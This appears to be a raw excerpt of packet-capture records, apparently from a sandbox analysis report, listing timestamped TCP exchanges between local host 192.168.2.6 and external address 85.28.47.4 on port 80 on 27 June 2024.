                                                                Jun 27, 2024 05:58:09.908060074 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.908063889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.908076048 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.908086061 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.908113003 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.908690929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.908703089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.908711910 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.908724070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.908735037 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.908747911 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.908751965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.908765078 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.908775091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.908777952 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.908788919 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.908801079 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.908806086 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.908824921 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.908842087 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.909378052 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.909389973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.909399986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.909411907 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.909423113 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.909429073 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.909434080 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.909445047 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.909456015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.909465075 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.909467936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.909478903 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.909483910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.909491062 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.909502029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.909507036 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.909514904 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.909524918 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.909527063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.909538984 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.909544945 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.909550905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.909568071 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.909584999 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.910341024 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.910351992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.910365105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.910376072 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.910377979 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.910387039 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.910393000 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.910399914 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.910410881 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.910410881 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.910420895 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.910433054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.910437107 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.910444021 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.910454988 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.910455942 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.910460949 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.910465956 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.910473108 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.910476923 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.910489082 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.910499096 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.910501003 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.910527945 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.910542011 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.911312103 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.911323071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.911333084 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.911345959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.911349058 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.911360025 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.911369085 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.911371946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.911389112 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.911398888 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.911401033 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.911412001 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.911415100 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.911422968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.911433935 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.911437988 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.911446095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.911456108 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.911462069 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.911468029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.911477089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.911479950 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.911489010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.911497116 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.911513090 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.911535978 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.912121058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912132978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912143946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912157059 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.912179947 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.912389994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912401915 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912412882 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912425995 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.912426949 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912437916 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912444115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912447929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912451982 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.912453890 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912458897 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912493944 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.912894011 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912905931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912915945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912928104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912933111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.912938118 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912955046 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912957907 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.912965059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.912997007 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.913012981 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.913589001 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.913602114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.913616896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.913629055 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.913635969 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.913640022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.913651943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.913652897 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.913664103 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.913676023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.913682938 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.913686991 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.913700104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.913711071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.913712025 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.913722992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.913733959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.913733959 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.913743973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.913753033 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.913754940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.913767099 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.913770914 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.913793087 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.913815975 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.914313078 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.914330959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.914343119 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.914350986 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.914352894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.914359093 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.914370060 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.914381027 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.914381027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.914392948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.914403915 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.914414883 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.914426088 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.914432049 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.914436102 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.914449930 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.914457083 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.914460897 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.914472103 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.914474010 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.914482117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.914498091 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.914522886 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.915088892 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915102005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915112972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915126085 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.915150881 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.915339947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915352106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915361881 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915371895 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915376902 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.915383101 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915394068 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.915395975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915415049 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915421963 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.915425062 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915436029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915447950 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.915458918 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915463924 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.915471077 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915481091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915487051 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.915492058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915502071 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.915502071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915513992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915524006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915527105 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.915535927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915549994 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.915550947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.915564060 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.915586948 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.916270018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.916282892 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.916294098 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.916305065 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.916306973 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.916316986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.916327953 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.916332006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.916357040 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.916373014 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.983586073 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.983617067 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.983629942 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.983665943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.983683109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.983695030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.983699083 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.983706951 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.983892918 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.983906031 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.983916998 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.983923912 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.983923912 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.983941078 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.983954906 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.984066963 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.984078884 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.984090090 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.984101057 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.984107018 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.984113932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.984132051 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.984159946 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.988152027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988183022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988193989 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988209963 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.988234997 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.988241911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988254070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988279104 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.988302946 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.988400936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988413095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988423109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988455057 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.988471985 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.988626957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988637924 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988647938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988660097 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988672018 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.988698959 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.988787889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988800049 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988811016 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988822937 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988830090 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.988837004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988847017 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.988848925 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988861084 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988873005 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.988873959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.988898039 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.988917112 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.989103079 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989115953 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989150047 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.989254951 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989267111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989278078 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989289045 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989300966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989301920 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.989312887 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989320993 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.989326000 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989340067 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.989367008 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.989547968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989561081 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989592075 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.989607096 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989626884 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989639044 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989650965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989656925 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.989661932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989670038 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.989697933 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.989892006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989916086 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989928007 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989938974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989939928 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.989953041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989964008 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.989964962 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989976883 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989989042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.989990950 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.990003109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.990010977 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.990015030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.990026951 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.990051985 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.990223885 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.990263939 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.990372896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.990385056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.990395069 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.990406990 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.990417957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.990418911 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.990430117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.990441084 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.990444899 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.990453005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.990463972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.990463972 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.990475893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.990483999 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.990494013 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.990499020 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.990523100 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.990540028 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.993187904 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993211985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993223906 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993248940 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.993278980 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:09.993401051 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993413925 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:09.993423939 CEST804971185.28.47.4192.168.2.6
